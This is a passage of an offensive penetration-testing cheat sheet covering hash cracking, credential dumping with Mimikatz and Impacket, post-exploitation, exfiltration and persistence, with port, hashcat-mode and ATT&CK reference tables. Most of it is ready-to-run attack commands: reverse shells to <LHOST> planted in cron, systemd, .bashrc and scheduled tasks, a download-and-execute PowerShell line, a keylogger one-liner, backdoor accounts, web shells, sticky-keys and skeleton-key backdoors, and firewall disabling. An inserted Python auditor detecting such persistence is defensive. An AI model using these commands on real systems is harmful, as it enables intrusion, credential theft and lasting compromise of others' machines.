hashcat -m 13100 hash.txt wordlist.txt
hashcat -m 18200 hash.txt wordlist.txt
hashcat -m 22000 hash.txt wordlist.txt
hashcat -m 16800 hash.txt wordlist.txt
hashcat -m 11600 hash.txt wordlist.txt
hashcat -m 13400 hash.txt wordlist.txt
hashcat -m 1500 hash.txt wordlist.txt
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
hashcat -m 1000 hash.txt wordlist.txt -r /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
hashcat -m 1000 hash.txt -a 3 ?u?l?l?l?l?d?d?d
hashcat -m 1000 hash.txt -a 3 ?a?a?a?a?a?a
John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --format=raw-md5 --wordlist=wordlist.txt hash.txt
john --format=nt --wordlist=wordlist.txt hash.txt
john --show hash.txt
unshadow /etc/passwd /etc/shadow > unshadowed.txt
john --wordlist=wordlist.txt unshadowed.txt
ssh2john id_rsa > id_rsa.hash
zip2john file.zip > zip.hash
rar2john file.rar > rar.hash
keepass2john db.kdbx > keepass.hash
pdf2john.pl file.pdf > pdf.hash
gpg2john file.gpg > gpg.hash
office2john.py file.docx > office.hash
pfx2john.py cert.pfx > pfx.hash
10.3 Wordlist Generation
cewl http://<RHOST> -m 6 -w wordlist.txt
cewl http://<RHOST> -m 6 -w wordlist.txt --with-numbers
crunch 8 8 -t ,@@^^@@, -o wordlist.txt
username-anarchy -i fullnames.txt -o usernames.txt
john --wordlist=wordlist.txt --rules --stdout > mutated.txt
hashcat --stdout -r /usr/share/hashcat/rules/best64.rule wordlist.txt > mutated.txt
11. POST-EXPLOITATION
11.1 Mimikatz (Windows)
# Load
mimikatz.exe
mimikatz # privilege::debug
mimikatz # token::elevate
# Dump credentials
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz # sekurlsa::kerberos
mimikatz # sekurlsa::msv
mimikatz # sekurlsa::credman
# SAM dump
mimikatz # lsadump::sam
mimikatz # lsadump::secrets
mimikatz # lsadump::cache
# DCSync
mimikatz # lsadump::dcsync /domain:<DOMAIN> /user:Administrator
mimikatz # lsadump::dcsync /domain:<DOMAIN> /all /csv
# Kerberos tickets
mimikatz # sekurlsa::tickets /export
mimikatz # kerberos::list /export
# Pass-the-Hash
mimikatz # sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<HASH> /run:cmd.exe
# Golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<HASH> /ptt
# Silver ticket
mimikatz # kerberos::golden /user:<USER> /domain:<DOMAIN> /sid:<SID> /target:<TARGET> /service:<SVC> /rc4:<HASH> /ptt
11.2 Impacket (Linux → Windows)
impacket-secretsdump <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-secretsdump <DOMAIN>/<USER>@<RHOST> -hashes :<NT_HASH>
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
impacket-psexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-wmiexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-smbexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-atexec <DOMAIN>/<USER>:<PASS>@<RHOST> "command"
impacket-dcomexec <DOMAIN>/<USER>:<PASS>@<RHOST>
impacket-GetUserSPNs <DOMAIN>/<USER>:<PASS> -dc-ip <DC_IP> -request
impacket-GetNPUsers <DOMAIN>/ -usersfile users.txt -dc-ip <DC_IP>
impacket-getTGT <DOMAIN>/<USER>:<PASS>
impacket-getST <DOMAIN>/<USER>:<PASS> -spn <SPN> -impersonate Administrator
impacket-ntlmrelayx -tf targets.txt -smb2support
11.3 Linux Post-Exploitation
cat /etc/passwd
cat /etc/shadow
cat /etc/ssh/sshd_config
find / -name "*.conf" -exec grep -l "password" {} \; 2>/dev/null
find / -name id_rsa 2>/dev/null
cat ~/.bash_history
cat ~/.mysql_history
env | grep -i pass
ip a
ip route
ss -tulnp
arp -a
cat /etc/hosts
cat /etc/resolv.conf
dpkg -l
rpm -qa
pip list
pip3 list
ps auxwww
systemctl list-units --type=service --state=running
tar czf /tmp/loot.tar.gz /home/ /etc/shadow /etc/passwd /root/.ssh/
11.4 Windows Post-Exploitation
# System info
systeminfo
ipconfig /all
route print
arp -a
netstat -ano
net user /domain
net group "Domain Admins" /domain
# Credential files
dir /s /b C:\*.config C:\*.cfg C:\*.ini C:\*.txt 2>nul | findstr /i password
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
cmdkey /list
# PowerShell
Get-Content (Get-PSReadlineOption).HistorySavePath
Get-ChildItem -Path C:\ -Include *.txt,*.ini,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"
# SAM/SYSTEM backup
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
11.5 Data Collection & Exfil
import -window root screenshot.png
python3 -c "from pynput.keyboard import Listener; Listener(on_press=lambda k: open('/tmp/.keys','a').write(str(k))).start()"
mysqldump -u root -p<PASS> --all-databases > dump.sql
pg_dump -U <USER> <DB> > dump.sql
sqlite3 db.sqlite .dump > dump.sql
tar czf /tmp/exfil.tar.gz /path/to/data
zip -r /tmp/exfil.zip /path/to/data
12. PERSISTENCE
12.1 Linux Persistence
SSH Keys
mkdir -p ~/.ssh
echo '<YOUR_PUBLIC_KEY>' >> ~/.ssh/authorized_keys
chmod 700 ~/.ssh
chmod 600 ~/.ssh/authorized_keys
Cron Jobs
(crontab -l 2>/dev/null; echo "*/5 * * * * bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1") | crontab -
echo "*/5 * * * * root bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1" >> /etc/crontab
Backdoor User
useradd -m -s /bin/bash -G sudo hacker
echo 'hacker:password123' | chpasswd
echo "hacker:$(openssl passwd -1 password123):0:0::/root:/bin/bash" >> /etc/passwd
SUID Backdoor
cp /bin/bash /tmp/.backdoor
chmod u+s /tmp/.backdoor
Systemd Service
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
Restart=always
RestartSec=60
[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable backdoor.service
systemctl start backdoor.service
.bashrc / .profile
echo 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 &' >> ~/.bashrc
echo 'nohup bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1 &' >> ~/.profile
PAM Backdoor
LD_PRELOAD
echo '/tmp/evil.so' >> /etc/ld.so.preload
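A host-side audit for the Linux persistence artefacts listed in 12.1 (an extra UID 0 account or a hash written straight into /etc/passwd, reverse-shell lines in crontab, rc files and systemd units, and entries in /etc/ld.so.preload). This is an added example, not part of the original reference; the file contents, IP address and paths it scans are constructed samples.

```python
import re
from dataclasses import dataclass

# Constructed sample artefacts (not taken from any real host); each mirrors one
# persistence technique from the section above so the checks run offline.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
hacker:$1$ab$cdefghij:0:0::/root:/bin/bash
"""
SAMPLE_CRONTAB = """SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root bash -i >& /dev/tcp/10.0.0.5/4444 0>&1
"""
SAMPLE_BASHRC = "alias ll='ls -l'\nnohup bash -i >& /dev/tcp/10.0.0.5/4444 0>&1 &\n"
SAMPLE_LD_PRELOAD = "/tmp/evil.so\n"
SAMPLE_UNITS = {
    "ssh.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "backdoor.service": "[Service]\nExecStart=/bin/bash -c 'bash -i >& "
                        "/dev/tcp/10.0.0.5/4444 0>&1'\nRestart=always\n",
}

# Idioms used by the one-liners above: /dev/tcp|udp redirection, nc -e, mkfifo pipes.
REVERSE_SHELL_RE = re.compile(r"/dev/(tcp|udp)/|\b(nc|ncat)\b.*\s-e\s|\bmkfifo\b")
# Second field of /etc/passwd is normally a placeholder; anything else is a hash.
PLACEHOLDER_PW = {"x", "*", "!", "!!", ""}


@dataclass(frozen=True)
class Finding:
    source: str
    detail: str


def check_passwd(text):
    """Flag extra UID 0 accounts and any hash stored directly in /etc/passwd."""
    findings = []
    for line in text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, pw, uid = parts[0], parts[1], parts[2]
        if uid == "0" and name != "root":
            findings.append(Finding("/etc/passwd", f"extra UID 0 account: {name}"))
        if pw not in PLACEHOLDER_PW:
            findings.append(Finding("/etc/passwd", f"hash in passwd for {name}"))
    return findings


def check_shell_text(source, text):
    """Flag lines of a crontab, rc file or unit file that carry reverse-shell idioms."""
    return [Finding(source, line.strip())
            for line in text.splitlines() if REVERSE_SHELL_RE.search(line)]


def check_ld_preload(text):
    """Any /etc/ld.so.preload entry deserves review; world-writable dirs rank HIGH."""
    findings = []
    for line in text.splitlines():
        path = line.strip()
        if not path or path.startswith("#"):
            continue
        sev = "HIGH" if path.startswith(("/tmp/", "/var/tmp/", "/dev/shm/")) else "MEDIUM"
        findings.append(Finding("/etc/ld.so.preload", f"{sev}: {path}"))
    return findings


def audit(passwd, crontab, bashrc, ld_preload, units):
    """Run every check and return the combined list of findings."""
    findings = check_passwd(passwd)
    findings += check_shell_text("/etc/crontab", crontab)
    findings += check_shell_text("~/.bashrc", bashrc)
    findings += check_ld_preload(ld_preload)
    for name, body in units.items():
        findings += check_shell_text(f"systemd:{name}", body)
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_PASSWD, SAMPLE_CRONTAB, SAMPLE_BASHRC, SAMPLE_LD_PRELOAD, SAMPLE_UNITS):
        print(f"[{f.source}] {f.detail}")
```

On a live host, feed the functions the real file contents (and the units under /etc/systemd/system) instead of the samples; the SUID-copy and authorized_keys techniques need a filesystem walk and are not covered here.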
12.2 Windows Persistence
Registry Run Keys
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\shell.exe" /f
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\temp\shell.exe" /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Backdoor /t REG_SZ /d "C:\temp\shell.exe" /f
Scheduled Tasks
schtasks /create /tn "Backdoor" /tr "C:\temp\shell.exe" /sc minute /mo 5 /ru System
schtasks /create /tn "Backdoor" /tr "powershell -ep bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://<LHOST>/shell.ps1')" /sc onlogon /ru System
New Admin User
net user backdoor Password123! /add
net localgroup Administrators backdoor /add
net localgroup "Remote Desktop Users" backdoor /add
WMI Event Subscription
$FilterArgs = @{name='Backdoor'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$Filter = New-CimInstance -ClassName __EventFilter -Namespace "root\subscription" -Property $FilterArgs
$ConsumerArgs = @{name='Backdoor'; CommandLineTemplate="C:\temp\shell.exe"}
$Consumer = New-CimInstance -ClassName CommandLineEventConsumer -Namespace "root\subscription" -Property $ConsumerArgs
$BindingArgs = @{Filter=[Ref]$Filter; Consumer=[Ref]$Consumer}
New-CimInstance -ClassName __FilterToConsumerBinding -Namespace "root\subscription" -Property $BindingArgs
Service Backdoor
sc create Backdoor binpath= "C:\temp\shell.exe" start= auto
sc start Backdoor
DLL Hijacking Persistence
# Find a service that loads a missing DLL
# Place malicious DLL in the search path
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f dll -o evil.dll
copy evil.dll "C:\path\to\hijackable\location\missing.dll"
Startup Folder
copy shell.exe "C:\Users\<USER>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"
copy shell.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
RDP Backdoor (Sticky Keys)
# Replace sethc.exe with cmd.exe
takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant administrators:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe /y
# Now press Shift 5 times at login screen for SYSTEM cmd
Skeleton Key (Domain Persistence)
mimikatz # misc::skeleton
# Now "mimikatz" works as password for any domain user
DCSync Persistence (AD)
Add-DomainObjectAcl -TargetIdentity "DC=<DOMAIN>,DC=<TLD>" -PrincipalIdentity <USER> -Rights DCSync
Golden Ticket (AD)
# With krbtgt hash, create tickets indefinitely
mimikatz # kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<HASH> /ticket:golden.kirbi
12.3 Web Persistence
Web Shell
echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/.shell.php
echo '<?php if(md5($_GET["k"])=="<MD5_OF_KEY>"){system($_GET["cmd"]);} ?>' > /var/www/html/.hidden.php
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f aspx -o /inetpub/wwwroot/.shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f raw -o /path/to/webapps/ROOT/.shell.jsp
.htaccess Backdoor
echo 'AddType application/x-httpd-php .evil' > /var/www/html/uploads/.htaccess
APPENDIX: QUICK REFERENCE TABLES
Common Ports
| Port | Service | Notes |
|---|---|---|
| 21 | FTP | Check anon login |
| 22 | SSH | Brute force, key auth |
| 23 | Telnet | Cleartext |
| 25 | SMTP | User enum, relay |
| 53 | DNS | Zone transfer |
| 80 | HTTP | Web attacks |
| 88 | Kerberos | AD attacks |
| 110 | POP3 | Email |
| 111 | RPCbind | NFS |
| 135 | MSRPC | Windows RPC |
| 139 | NetBIOS | SMB |
| 143 | IMAP | Email |
| 161 | SNMP | Community strings |
| 389 | LDAP | AD enum |
| 443 | HTTPS | Web attacks |
| 445 | SMB | Shares, EternalBlue |
| 636 | LDAPS | AD enum |
| 1433 | MSSQL | xp_cmdshell |
| 1521 | Oracle | TNS |
| 2049 | NFS | Mount shares |
| 3306 | MySQL | UDF, file read |
| 3389 | RDP | Remote desktop |
| 5432 | PostgreSQL | COPY FROM PROGRAM |
| 5900 | VNC | Screen sharing |
| 5985 | WinRM | Evil-WinRM |
| 6379 | Redis | Unauth access |
| 8080 | HTTP-Alt | Web attacks |
| 8443 | HTTPS-Alt | Web attacks |
| 27017 | MongoDB | NoSQL |
Hashcat Mode Reference
| Mode | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 500 | md5crypt |
| 1000 | NTLM |
| 1400 | SHA256 |
| 1800 | sha512crypt |
| 3200 | bcrypt |
| 5500 | NetNTLMv1 |
| 5600 | NetNTLMv2 |
| 7500 | Kerberos 5 AS-REQ |
| 13100 | Kerberos 5 TGS-REP |
| 18200 | Kerberos 5 AS-REP |
| 22000 | WPA-PBKDF2 |
MITRE ATT&CK Quick Map
| Phase | Technique ID | Name |
|---|---|---|
| Recon | T1595 | Active Scanning |
| Recon | T1592 | Gather Victim Host Info |
| Initial Access | T1190 | Exploit Public-Facing App |
| Initial Access | T1078 | Valid Accounts |
| Execution | T1059 | Command & Scripting |
| Persistence | T1053 | Scheduled Task/Job |
| Persistence | T1547 | Boot/Logon Autostart |
| Persistence | T1136 | Create Account |
| Priv Esc | T1068 | Exploitation for Priv Esc |
| Priv Esc | T1055 | Process Injection |
| Defense Evasion | T1070 | Indicator Removal |
| Credential Access | T1003 | OS Credential Dumping |
| Credential Access | T1558 | Steal/Forge Kerberos Tickets |
| Lateral Movement | T1021 | Remote Services |
| Lateral Movement | T1550 | Use Alternate Auth Material |
| Collection | T1005 | Data from Local System |
| Exfiltration | T1041 | Exfil Over C2 Channel |
Firewall Rules (Quick Disable)
iptables -F
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
netsh advfirewall set allprofiles state off
netsh firewall set opmode mode=DISABLE
Compilation Quick Reference
gcc exploit.c -o exploit
gcc -m32 exploit.c -o exploit32
gcc -m32 -Wl,--hash-style=both exploit.c -o exploit
i686-w64-mingw32-gcc exploit.c -o exploit.exe -lws2_32
x86_64-w64-mingw32-gcc exploit.c -o exploit.exe
gcc -shared -fPIC -o evil.so evil.c
gcc -shared -fPIC -nostartfiles -o evil.so evil.c
pyinstaller --onefile script.py
CIPHER - Compiled under authorized penetration testing assumption.
Use responsibly. Unauthorized access to computer systems is illegal.